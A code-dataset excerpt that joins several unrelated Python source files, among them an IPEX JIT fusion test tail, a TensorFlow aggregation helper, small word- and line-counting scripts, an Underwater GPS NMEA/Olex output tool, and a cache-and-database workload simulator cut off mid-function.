CascadedConvBnSumRelu(2, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum_relu",
kind_not_in_graph="aten::batch_norm")
self._test_output_bf16(
CascadedConvBnSumRelu(2, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum_relu",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_cascaded_conv_bn_sum_relu_3d(self):
self._test_output(
CascadedConvBnSumRelu(3, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum_relu",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
CascadedConvBnSumRelu(3, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum_relu",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_linear_relu(self):
self._test_output(
LinearRelu(3, 32, bias=True),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output_bf16(
LinearRelu(3, 32, bias=True),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output(
LinearRelu(3, 32, bias=False),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output_bf16(
LinearRelu(3, 32, bias=False),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
def test_jit_function(self):
# test hool trace and script can works for function
def fn(input, weight, bias):
return F.linear(input, weight, bias)
input = torch.randn(2, 4)
weight = torch.randn(5, 4)
bias = torch.randn(5)
result = fn(input, weight, bias)
scripted_fn = torch.jit.script(fn)
traced_fn = torch.jit.trace(fn, (input, weight, bias))
self.assertEqual(scripted_fn(input, weight, bias), result)
self.assertEqual(traced_fn(input, weight, bias), result)
def test_jit_conv_sum_in_diff_block(self):
self._test_output(
ConvSumInDiffBlock(2, 3, 32, kernel_size=1, stride=1, padding=0),
torch.rand(32, 3, 64, 64),
kind_not_in_graph="ipex::conv2d_sum")
self._test_output_bf16(
ConvSumInDiffBlock(2, 3, 32, kernel_size=1, stride=1, padding=0),
torch.rand(32, 3, 64, 64),
kind_not_in_graph="ipex::conv2d_sum")
if __name__ == '__main__':
torch.manual_seed(2020)
core.enable_auto_dnnl()
test = unittest.main()
``` |
{
"source": "jiayixu64/graph-partition-neural-network-samples",
"score": 3
} |
#### File: gpnn/model/model_helper.py
```python
import tensorflow as tf
def aggregate(data, agg_idx, new_size, method="sum"):
""" Aggregate data
Args:
data: tf tensor, see "unsorted_segment_x" in tf documents for more detail
agg_idx: tf tensor of int, index for aggregation
new_size: tf tensor of int, size of the data after aggregation
method: aggregation method
Returns:
agg_data: tf tensor, aggregated data
"""
if method == "sum":
agg_data = tf.unsorted_segment_sum(data, agg_idx, new_size)
elif method == "avg":
agg_data = tf.unsorted_segment_sum(data, agg_idx, new_size)
denom_const = tf.unsorted_segment_sum(tf.ones_like(data), agg_idx, new_size)
agg_data = tf.div(agg_data, (denom_const + tf.constant(1.0e-10)))
elif method == "max":
agg_data = tf.unsorted_segment_max(data, agg_idx, new_size)
elif method == "min":
agg_data = tf.unsorted_segment_max(-data, agg_idx, new_size)
else:
raise ValueError("Unsupported aggregation method!")
return agg_data
``` |
{
"source": "JiayiXu/PythonLearning",
"score": 4
} |
#### File: PythonLearning/004_count_words/count.py
```python
import operator
import sys
def main(argv):
if len(argv) < 1:
print("Usage:get_count.py <file> <top count=10>")
sys.exit(2)
file_name = argv[0]
top_count = 10
if len(argv) > 1:
top_count = int(argv[1])
word_count = {}
with open(file_name, 'r') as file:
for line in file:
splits = line.split(' ')
for word in splits:
if word not in word_count:
word_count[word] = 0
word_count[word] = word_count[word] + 1
sorted_x = sorted(word_count.items(), key=operator.itemgetter(1))
sorted_x.reverse()
top_k = sorted_x[:top_count]
print("top k is {}".format(top_k))
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: PythonLearning/007_count_code_info/count_code_info.py
```python
import uuid
import sys
import os
def main(argv):
if len(argv) != 1:
print("Usage:count_count_info.py <path>")
sys.exit(2)
count_code = 0
count_comments = 0
count_spaces = 0
for dirpath, _, filenames in os.walk(argv[0]):
for file_name in filenames:
if os.path.splitext(file_name)[1] == '.py':
full_path = os.path.join(dirpath, file_name)
code, comments, spaces = get_statistics(full_path)
count_code += code
count_comments += comments
count_spaces += spaces
print("Count_code:%s, count_comments:%s, count_spaces:%s" % (count_code, count_comments, count_spaces))
def get_statistics(full_path):
count_code = 0
count_comments = 0
count_spaces = 0
with open(full_path, "r") as ins:
is_start_of_comments = False
for line in ins:
context = line.strip()
if context.startswith('#') or context.startswith('"""') or is_start_of_comments is True:
count_comments += 1
elif context == '':
count_spaces += 1
else:
count_code += 1
if context.startswith('"""'):
is_start_of_comments = True
if context[::-1].startswith('"""'):
is_start_of_comments = False
return count_code, count_comments, count_spaces
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: 007_count_code_info/test/test.py
```python
import abc
import sys
def a():
# type something
"""this is a test progmra"""
return c
``` |
{
"source": "JiaYong-Chen/Underwater-GPS-API",
"score": 3
} |
#### File: JiaYong-Chen/Underwater-GPS-API/olexoutput.py
```python
from __future__ import print_function
from nmeaoutput import get_data, checksum, send_udp, get_master_position
import requests
import argparse
import json
import time
from math import floor
import socket
import sys
def get_acoustic_position(base_url):
return get_data("{}/api/v1/position/acoustic/filtered".format(base_url))
def gen_ssb(time_t, x, y, z):
"""
Generate PSIMSBB for Olex http://www.olex.no/olexiti.html
Valid sentence:
$PSIMSSB,180554.432,M44,A,,C,N,M,-61.300,39.017,34.026,0.072,T,0.050576,*47
1 ,2 ,3 ,5,6,7, 8 , 9 , 10 , 11 ,12,13, crc
1 = Time
2 = Name
3 = A
4 = Empty
5 = C - Cartesian
6 = N/E/H, N=North up, E=East up, H=vessel heading up
7 = any char, sw-filter: M Measured, F Filtered, P Predicted.
8 = distance in horizontal plane x (C+H => Starboard)
9 = distance in horizontal plane y (C+H => Forwards)
10 = distance in vertical plane depth
11 = ??
12 = T??
13 = ??
"""
hhmmssss = '%02d%02d%02d%s' % (time_t.tm_hour, time_t.tm_min, time_t.tm_sec, '.%02d' if 0 != 0 else '')
name = 'UGPS'
result = 'PSIMSSB,{0},{1},{2},{3},{4},{5},{6},{7:.2f},{8:.2f},{9:.2f},{10},{11},{12}'.format(
hhmmssss, name, 'A', '', 'C', 'H', 'M', x, y, z, 'T', '', '')
crc = checksum(result)
return '$%s*%0.2X' % (result, crc)
def gen_sns(time_t, heading):
"""
$PSIMSNS,180554.432,M44,1,2,0.0,1.0,2.0,42, , ,1.5, , ,*47
1 ,2 ,3,4,5 , 6 , 7 , 8,9,10, 11,12,13, crc
1 = Time
2 = Name
3 = Transceiver number
4 = Transducer number
5 = Roll
6 = Pitch
7 = Heave
8 = Heading
9 = Tag
10 = Parameters
11 = Time age
12 = Spare1
13 = Master/Slave
"""
hhmmssss = '%02d%02d%02d%s' % (time_t.tm_hour, time_t.tm_min, time_t.tm_sec, '.%02d' if 0 != 0 else '')
name = 'UGPS'
result = 'PSIMSNS,{0},{1},{2},{3},{4},{5},{6},{7:.1f},{8},{9},{10},{11},{12}'.format(
hhmmssss, name, '1', '1', '', '', '', heading, '', '', '1.0', '', '')
crc = checksum(result)
return '$%s*%0.2X' % (result, crc)
class Sender(object):
def __init__(self, ser, sock, ip, port, verbose):
self.ser = ser
self.sock = sock
self.ip = ip
self.port = port
self.verbose = verbose
def send(self, sentence):
if self.verbose:
print(sentence)
if self.sock:
send_udp(self.sock, self.ip, self.port, sentence)
if self.ser:
self.ser.write(sentence + "\n")
def main():
if sys.version_info >= (3, 0):
sys.stdout.write("This has only been tested with Python 2.x, not Python 3.x\n")
sys.exit(1)
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-u', '--url', help='IP/URL of Underwater GPS kit. Typically http://192.168.2.94', type=str, default='http://demo.waterlinked.com')
parser.add_argument("-v", "--verbose", help="Print NMEA sentences", action="store_true")
# UDP options
parser.add_argument('-i', '--ip', help="Enable UDP output by specifying IP address to send UDP packets. Default disabled", type=str, default='')
parser.add_argument('-p', '--port', help="Port to send UDP packet", type=int, default=5000)
# Serial port options
parser.add_argument('-s', '--serial', help="Enable serial port output by specifying port to use. Example: '/dev/ttyUSB0' or 'COM1' Default disabled", type=str, default='')
parser.add_argument('-b', '--baud', help="Serial port baud rate", type=int, default=9600)
args = parser.parse_args()
if not (args.ip or args.serial):
parser.print_help()
print("ERROR: Please specify either serial port to use, ip address to use")
sys.exit(1)
print("Using base_url: {}".format(args.url))
ser = None
if args.serial:
import serial
print("Serial port: {}".format(args.serial))
ser = serial.Serial(args.serial, args.baud)
sock = None
if args.ip:
print("UDP: {} {}".format(args.ip, args.port))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender = Sender(ser, sock, args.ip, args.port, args.verbose)
while True:
pos = get_acoustic_position(args.url)
if pos:
sentence = gen_ssb(time.gmtime(), pos["x"], pos["y"], pos["z"])
sender.send(sentence)
master = get_master_position(args.url)
if master:
sentence = gen_sns(time.gmtime(), master["orientation"])
sender.send(sentence)
time.sleep(0.2)
if __name__ == "__main__":
main()
``` |
{
"source": "jiayouanan/cc_cache",
"score": 2
} |
#### File: jiayouanan/cc_cache/OFF_main.py
```python
import configparser
import yaml
from multiprocessing import Process, Queue
from TCache.sys_op import WorkloadTest, SystemOperator
import os
import time
def backend_config_parse(filename='config/backend.ini'):
"""Parse backend connection configurations."""
parser = configparser.ConfigParser()
parser.read(filename)
db_conn_param, cache_conn_param = {}, {}
if parser.has_section("system"):
params = parser.items(section="system")
for param in params:
if param[0] == "db":
db_conn_param[param[0]] = param[1]
if param[0] == "cache":
cache_conn_param[param[0]] = param[1]
else:
print('[system] section not found in {}, exiting.'.format(filename))
exit(1)
db_params = parser.items(section=db_conn_param["db"])
for param in db_params:
db_conn_param[param[0]] = param[1]
cache_params = parser.items(section=cache_conn_param["cache"])
for param in cache_params:
cache_conn_param[param[0]] = param[1]
return db_conn_param, cache_conn_param
def alg_config_parse(filename='config/sysTest.yaml'):
with open(filename, 'r') as fp:
try:
alg_dict = yaml.safe_load(fp)
alg_dict['dataset_dir'] = alg_dict['dataset_root'] + "/" + alg_dict['dataset_name']
return alg_dict
except yaml.YAMLError as exc:
print(exc)
def system_process(config_file, queue, sys_test):
"""Process DB and Cache operations."""
# ---------- debug only ----------
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
# ---------- debug only ----------
db_conn_param, cache_conn_param = backend_config_parse(config_file)
if sys_test:
sys_op = SystemOperator(db_conn_param, cache_conn_param)
print('SYS Start Time: {}'.format(time.time()))
sys_op.operation_exe(op_queue=queue)
print('SYS End Time: {}'.format(time.time()))
sys_op.cleanup()
def alg_process(alg_dict, queue):
alg_test = WorkloadTest(dataset_dir=alg_dict['dataset_dir'], sys_test=alg_dict['sys_test'])
print('ALG Start time: {}'.format(time.time()))
alg_test.batch_test(queue, csize=alg_dict['csize'], cache_scheme=alg_dict['cache_scheme'], alg_name=alg_dict['alg_name'], batch_size=alg_dict['batch_size'],
reorder_flag=alg_dict['reorder_flag'], liveness_bound=alg_dict['liveness_bound'], reorder_name=alg_dict['reorder_name'], opt_len=alg_dict['opt_len'])
print('ALG End Time: {}'.format(time.time()))
if __name__ == '__main__':
alg_dict = alg_config_parse('config/sysTest.yaml')
op_queue = Queue() # system operation queue
sys_test = alg_dict['sys_test']
p = Process(target=system_process, args=('config/backend.ini', op_queue, sys_test)) # child process
p.start()
alg_process(alg_dict, op_queue) # parent process
p.join()
```
#### File: cc_cache/TCache/sys_op.py
```python
from multiprocessing import Queue
import time
from utils.load_dataset import load_item_univ, load_txn_univ, load_txn_seq, load_ycsb_seq
from TCache.cache_alg import SingleAlg
from TCache.reorder_alg import ReorderAlg
import numpy as np
import json
import pdb
import os
import psycopg2
import happybase
from pymemcache.client import base
from pymemcache.client.base import PooledClient
import csv
class WorkloadManager(object):
"""Manage workload for TCache
"""
def __init__(self, dataset_dir: str, sys_test=True) -> None:
super().__init__()
# load entire workload data from dataset_dir
item_size_path = dataset_dir + '/item_size.pkl'
cls_item_path = dataset_dir + '/cls_item.pkl'
txn_item_path = dataset_dir + '/txn_item.pkl'
id_seq_path = dataset_dir + '/id_seq.npy'
flag_seq_path = dataset_dir + '/flag_seq.npy'
self.item_size_dict, self.cls_item_dict = load_item_univ(item_size_path, cls_item_path)
self.txn_item_dict = load_txn_univ(txn_item_path)
self.txn_id_seq, self.write_flag_seq = load_txn_seq(id_seq_path, flag_seq_path)
if sys_test:
ycsb_seq_path = dataset_dir + '/transactions.dat'
self.ycsb_id_2_key, self.ycsb_id_2_read, self.ycsb_id_2_write = load_ycsb_seq(ycsb_seq_path)
self.get_workload_stats(print_stats=True)
def get_workload_stats(self, print_stats=True) -> None:
""" Get statistics for workload data. """
query_num = len(self.item_size_dict)
cls_num = len(self.cls_item_dict)
seq_len = len(self.txn_id_seq)
read_qry_cnt, wrt_qry_cnt = 0, 0
wrt_txn_cnt = self.write_flag_seq.sum()
read_txn_cnt = len(self.write_flag_seq) - wrt_txn_cnt
# item_read_time_dict & item_write_time_dict just for workload statistics
item_read_time_dict, item_write_time_dict = {i:[] for i in range(query_num)}, {i:[] for i in range(query_num)}
for time_step in range(len(self.txn_id_seq)):
txn_vec = self.txn_item_dict[self.txn_id_seq[time_step]]
if self.write_flag_seq[time_step]:
wrt_qry_cnt += np.sum(txn_vec)
for item_id in np.where(txn_vec == 1)[0]:
item_write_time_dict[item_id].append(time_step)
else:
read_qry_cnt += np.sum(txn_vec)
for item_id in np.where(txn_vec == 1)[0]:
item_read_time_dict[item_id].append(time_step)
dist_read_qry_cnt, dist_wrt_qry_cnt = 0, 0
for i in range(query_num):
if len(item_read_time_dict[i]) > 0:
dist_read_qry_cnt += 1
if len(item_write_time_dict[i]) > 0:
dist_wrt_qry_cnt += 1
total_item_size = sum(self.item_size_dict.values())
self.workload_stats = {'query_num': query_num, 'cls_num': cls_num,
'total_size': total_item_size, 'seq_len': seq_len,
'read_txn_cnt': read_txn_cnt, 'write_txn_cnt': wrt_txn_cnt,
'read_qry_cnt': read_qry_cnt, 'write_qry_cnt': wrt_qry_cnt,
'unique_read_qry_cnt': dist_read_qry_cnt, 'unique_write_qry_cnt': dist_wrt_qry_cnt}
workload_stats_columns = ['query_num', 'cls_num', 'total_size', 'seq_len',
'read_txn_cnt', 'write_txn_cnt', 'read_qry_cnt', 'write_qry_cnt', 'unique_read_qry_cnt', 'unique_write_qry_cnt']
dict_data = [
{'query_num': query_num, 'cls_num': cls_num,
'total_size': total_item_size, 'seq_len': seq_len,
'read_txn_cnt': read_txn_cnt, 'write_txn_cnt': wrt_txn_cnt,
'read_qry_cnt': read_qry_cnt, 'write_qry_cnt': wrt_qry_cnt,
'unique_read_qry_cnt': dist_read_qry_cnt, 'unique_write_qry_cnt': dist_wrt_qry_cnt}]
csv_file = "data/res/workload_stats.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=workload_stats_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
if print_stats:
print(self.workload_stats)
# json.dumps(self.workload_stats, indent=4)
class WorkloadTest(WorkloadManager):
""" Create input for algorithm, operate Cache and DB accordingly. """
def __init__(self, dataset_dir: str, sys_test=True) -> None:
super().__init__(dataset_dir, sys_test)
self.sys_test = sys_test
self.orireor_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int) # reorder seq based our strategy
self.ran_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.readfir_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int) #
self.wrtfir_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
# generate reordered txn_id_seq, write_flag_seq and txn_item_dict
self.reor_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.reor_write_flag_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.reor_txn_item_dict = {}
def generate_reor_res_seq(self, batch_start, batch_size, orireor_txn_id_seq, write_flag_seq, txn_item_dict):
""" generate reordered txn_id_seq, write_flag_seq and txn_item_dict based on orireor_txn_id_seq"""
for ordered_txn_num in range(batch_size):
self.reor_txn_id_seq[batch_start+ordered_txn_num] = batch_start+ordered_txn_num
self.reor_write_flag_seq[batch_start+ordered_txn_num] = write_flag_seq[orireor_txn_id_seq[batch_start+ordered_txn_num]]
self.reor_txn_item_dict[batch_start+ordered_txn_num] = txn_item_dict[orireor_txn_id_seq[batch_start+ordered_txn_num]]
def batch_test(self, queue: Queue, csize: float, cache_scheme: str, alg_name: str, batch_size: int, reorder_flag:bool, liveness_bound:int, reorder_name:str, opt_len=500) -> dict:
""" Test transaction sequence in batches. """
assert self.workload_stats['seq_len'] % batch_size == 0 # transaction sequence consists of full batches by default
cache_size = int(csize * self.workload_stats['total_size'])
assert 'Comb' not in alg_name # TODO: support combiner style caching algorithm
alg_obj = SingleAlg(alg_name)
# using opt_len as findOB truncate length for optimization
alg_obj.workload_init(cache_size, cache_scheme, item_num=self.workload_stats['query_num'], findOB_trunc=opt_len)
batch_num = int(self.workload_stats['seq_len'] / batch_size)
item_num = self.workload_stats['query_num']
seq_start_time = time.time()
off_liveness, ran_liveness, readfir_liveness, wrtfir_liveness = 0, 0, 0, 0
off_max_liveness, ran_max_liveness, readfir_max_liveness, wrtfir_max_liveness = 0, 0, 0, 0
for i in range(batch_num):
batch_start, batch_end = i * batch_size, (i + 1) * batch_size
# TODO: define a new reorder object, generate the reordered txn_id_seq[batch_start:batch_end] & write_flag_seq[batch_start:batch_end]
if reorder_flag:
print("reordering start")
reorder_obj = ReorderAlg(cache_size)
reorder_obj.init_read_write_time(item_num, txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, batch_start=batch_start)
if reorder_name in ['Greedy']:
# print("Greedy reorder algorithm")
reorder_obj.get_writetxn_bond_readtxn(batch_start=batch_start, batch_end=batch_end,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, liveness_bound=liveness_bound)
reorder_obj.pick_readtxn2wrttxn(batch_start, batch_size)
self.orireor_txn_id_seq = reorder_obj.reorder_read_main(item_num, batch_start, batch_size, self.txn_id_seq[batch_start:batch_end],
self.write_flag_seq[batch_start:batch_end], self.item_size_dict, self.txn_item_dict, self.orireor_txn_id_seq)
self.generate_reor_res_seq(batch_start, batch_size, self.orireor_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
# compute the liveness based on the reordered seq
off_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.orireor_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
off_liveness += off_liveness_res[0]
off_max_liveness += off_liveness_res[1]
if reorder_name in ['Random']:
self.ran_txn_id_seq = reorder_obj.get_random_seq(batch_start, batch_end, self.ran_txn_id_seq)
ran_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.ran_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
ran_liveness += ran_liveness_res[0]
ran_max_liveness += ran_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.ran_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
if reorder_name in ['Readfir']:
self.readfir_txn_id_seq = reorder_obj.get_allreadfirst_seq(batch_start, batch_size, self.readfir_txn_id_seq)
readfir_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.readfir_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
readfir_liveness += readfir_liveness_res[0]
readfir_max_liveness += readfir_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.readfir_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
if reorder_name in ['Wrtfir']:
self.wrtfir_txn_id_seq = reorder_obj.get_allwrtfirst_seq(batch_start, batch_size, self.wrtfir_txn_id_seq)
wrtfir_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.wrtfir_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
wrtfir_liveness += wrtfir_liveness_res[0]
wrtfir_max_liveness += wrtfir_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.wrtfir_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
else:
self.reor_txn_id_seq = self.txn_id_seq
self.reor_write_flag_seq = self.write_flag_seq
self.reor_txn_item_dict = self.txn_item_dict
# get item read and write time for current batch
alg_obj.init_read_write_time(txn_id_seq=self.reor_txn_id_seq[batch_start:batch_end],
write_flag_seq=self.reor_write_flag_seq[batch_start:batch_end],
txn_item_dict=self.reor_txn_item_dict, batch_start=batch_start)
for time_step in range(batch_start, batch_end):
op_ret_dict = alg_obj.batch_step_process(time_step, batch_start, batch_end, self.reor_txn_id_seq[batch_start:batch_end],
self.reor_write_flag_seq[batch_start:batch_end], self.item_size_dict, self.reor_txn_item_dict, self.cls_item_dict)
if self.sys_test:
# TODO: carry out cache and DB operation here
tmp_op_dict = {}
if 'write_items' in op_ret_dict:
query_list = [self.ycsb_id_2_write[item_id] for item_id in np.where(op_ret_dict['write_items'] == 1)[0]]
tmp_op_dict['db_write'] = query_list
tmp_op_dict['db_write_key'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['write_items'] == 1)[0]]
# self.db_write_txn(query_list)
if 'acc_update' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['acc_update'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['acc_update'] = query_list
tmp_op_dict['acc_update_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
if 'evict_from_cache' in op_ret_dict:
tmp_op_dict['cache_evict'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['evict_from_cache'] == 1)[0]]
if 'read_on_miss' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['read_on_miss'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['read_on_miss'] = query_list
tmp_op_dict['read_on_miss_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
# self.load_to_cache(op_ret_dict['read_on_miss'])
if 'read_on_abort' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['read_on_abort'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['read_on_abort'] = query_list
tmp_op_dict['read_on_abort_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
# self.load_to_cache(op_ret_dict['read_on_abort'])
if 'read_from_cache' in op_ret_dict:
tmp_op_dict['cache_read'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['read_from_cache'] == 1)[0]]
# txn_answ = self.cache_client.get_many([self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['read_from_cache'] == 1)[0]])
queue.put(tmp_op_dict)
queue.put(None)
seq_end_time = time.time()
alg_obj.print_stats()
# print('off_liveness: {}, ran_liveness: {}, readfir_liveness: {}, wrtfir_liveness: {}'.format(
# off_liveness/batch_num, ran_liveness/batch_num, readfir_liveness/batch_num, wrtfir_liveness/batch_num))
# only when compare the performance of the reorder strategies, this csv file is useful.
res_columns = ['off_avg_liveness', 'ran_avg_liveness', 'readfir_avg_liveness', 'wrtfir_avg_liveness',
'off_max_liveness', 'ran_max_liveness', 'readfir_max_liveness', 'wrtfir_max_liveness']
dict_data = [
{'off_avg_liveness': off_liveness/batch_num, 'ran_avg_liveness': ran_liveness/batch_num, 'readfir_avg_liveness': readfir_liveness/batch_num, 'wrtfir_avg_liveness': wrtfir_liveness/batch_num,
'off_max_liveness': off_max_liveness/batch_num, 'ran_max_liveness': ran_max_liveness/batch_num, 'readfir_max_liveness': readfir_max_liveness/batch_num, 'wrtfir_max_liveness': wrtfir_max_liveness/batch_num}]
csv_file = "data/res/liveness.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=res_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
res_columns = ['alg_name', 'cache_scheme', 'cost', 'whole_cost',
'ob_cnt', 'evict_cnt','cch_cnt']
dict_data = [
{'alg_name': alg_obj.alg_name, 'cache_scheme': alg_obj.cache_scheme, 'cost': alg_obj.cost, 'whole_cost': alg_obj.whole_cost,
'ob_cnt': alg_obj.ob_cnt, 'evict_cnt': alg_obj.evict_cnt, 'cch_cnt': alg_obj.cch_cnt}]
csv_file = "data/res/res.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=res_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
print('ALG Total Time: {}'.format(seq_end_time - seq_start_time))
# TODO: calculate throughput, save algorithm simulation result
class SystemOperator:
"""Operate DB and cache based on operations in queue."""
def __init__(self, db_conn_param: dict, cache_conn_param: dict) -> None:
self.db_sys = db_conn_param["db"]
del db_conn_param['db']
if self.db_sys == "postgresql":
self.db_conn = psycopg2.connect(**db_conn_param)
self.db_conn.set_session(autocommit=False)
self.db_cursor = self.db_conn.cursor()
else:
assert self.db_sys == "hbase"
# self.db_conn = happybase.Connection(host=db_conn_param["host"], port=db_conn_param["port"])
self.db_conn = happybase.Connection(host=db_conn_param["host"], port=9090)
self.table = self.db_conn.table('usertable')
self.cache_sys = cache_conn_param["cache"]
del cache_conn_param['cache']
if self.cache_sys == "memcached":
self.cache_client = base.Client((cache_conn_param['host'], int(cache_conn_param['port'])))
# self.cache_client = PooledClient(('127.0.0.1', int(cache_conn_param['port'])), max_pool_size = 400)
self.cache_client.flush_all()
def operation_exe(self, op_queue: Queue):
"""Get operations from queue, execute them."""
counter = 0
db_read_time, db_write_time, cache_read_time, cache_write_time = 0, 0, 0, 0
cache_counter = 0
cache_list = []
while True:
op_dict = op_queue.get() # wait unless there is value in queue. Default: blocking
if op_dict is None:
print('counter: {}'.format(counter))
print("cache_counter:", cache_counter)
sys_end_time = time.time()
if sys_start_time is not None:
print('System Execution Time: {}'.format(sys_end_time - sys_start_time))
print('db_read_time: {}, db_write_time: {}'.format(db_read_time, db_write_time))
print('cache_read_time: {}, cache_write_time: {}'.format(cache_read_time, cache_write_time))
break
else:
if counter == 0:
sys_start_time = time.time()
if 'db_write' in op_dict:
db_write_time += self.db_write_txn(op_dict['db_write'], op_dict['db_write_key'])
if 'acc_update' in op_dict:
db_read_time += self.load_to_cache(op_dict['acc_update'], op_dict['acc_update_key'])
if 'cache_evict' in op_dict:
tmp_start_time = time.time()
self.cache_client.delete_many(op_dict['cache_evict'])
cache_write_time += time.time() - tmp_start_time
if 'read_on_miss' in op_dict:
db_read_time += self.load_to_cache(op_dict['read_on_miss'], op_dict['read_on_miss_key'])
if 'read_on_abort' in op_dict:
db_read_time += self.load_to_cache(op_dict['read_on_abort'], op_dict['read_on_abort_key'])
if 'cache_read' in op_dict:
cache_counter += 1
cache_list.append(op_dict['cache_read'][0])
# sumbit in a batch way
if (counter%100==0):
# print("*"*100)
tmp_start_time = time.time()
self.cache_client.get_many(cache_list)
cache_read_time += time.time() - tmp_start_time
#tmp_start_time = time.time()
#self.cache_client.get_many(op_dict['cache_read']) # the type of op_dict['cache_read'] is list
#print('each get memcache time: {}, counter: {}'.format(time.time() - tmp_start_time, counter))
#if (time.time() - tmp_start_time>0.02):
# cache_counter+=1
#cache_read_time += time.time() - tmp_start_time
counter += 1
def load_to_cache(self, query_list: list, key_str_list: list):
"""Execute read transaction at database and load results to cache."""
tmp_load_start_time = time.time()
if self.db_sys == "postgresql":
try:
txn_res_list = []
for query_str in query_list:
self.db_cursor.execute(query_str)
txn_res_list.extend(self.db_cursor.fetchall())
self.db_conn.commit()
for query_result in txn_res_list:
self.cache_client.set(query_result[0], ''.join(query_result[1:]))
except psycopg2.DatabaseError as e:
print('PostgreSQL read transaction execution error')
self.db_conn.rollback()
else: # HBase read transaction
try:
txn_res_list = []
for (key_str, qual_bytes_list) in zip(key_str_list, query_list):
row = self.table.row(key_str.encode('utf-8'), columns=qual_bytes_list)
txn_res_list.append((key_str, b''.join(row.values()).decode('utf-8')))
self.cache_client.set_many(dict(txn_res_list))
except ValueError:
print('HBase value error.')
pass
tmp_load_end_time = time.time()
return tmp_load_end_time - tmp_load_start_time
def db_write_txn(self, query_list: list, key_str_list: list):
"""Execute write transaction at database."""
tmp_write_start_time = time.time()
if self.db_sys == "postgresql": # postgresql write transaction
try:
